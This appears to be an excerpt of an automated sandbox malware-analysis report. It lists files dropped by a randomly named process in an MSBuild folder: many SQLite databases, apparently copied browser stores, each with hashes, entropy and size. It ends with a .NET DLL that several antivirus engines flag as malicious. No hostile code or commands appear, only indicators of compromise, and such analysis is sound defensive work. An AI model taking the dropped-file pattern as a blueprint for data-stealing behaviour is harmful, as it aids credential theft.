                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):38400
                                                                                      Entropy (8bit):5.699005826018714
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                      MD5:87765D141228784AE91334BAE25AD743
                                                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
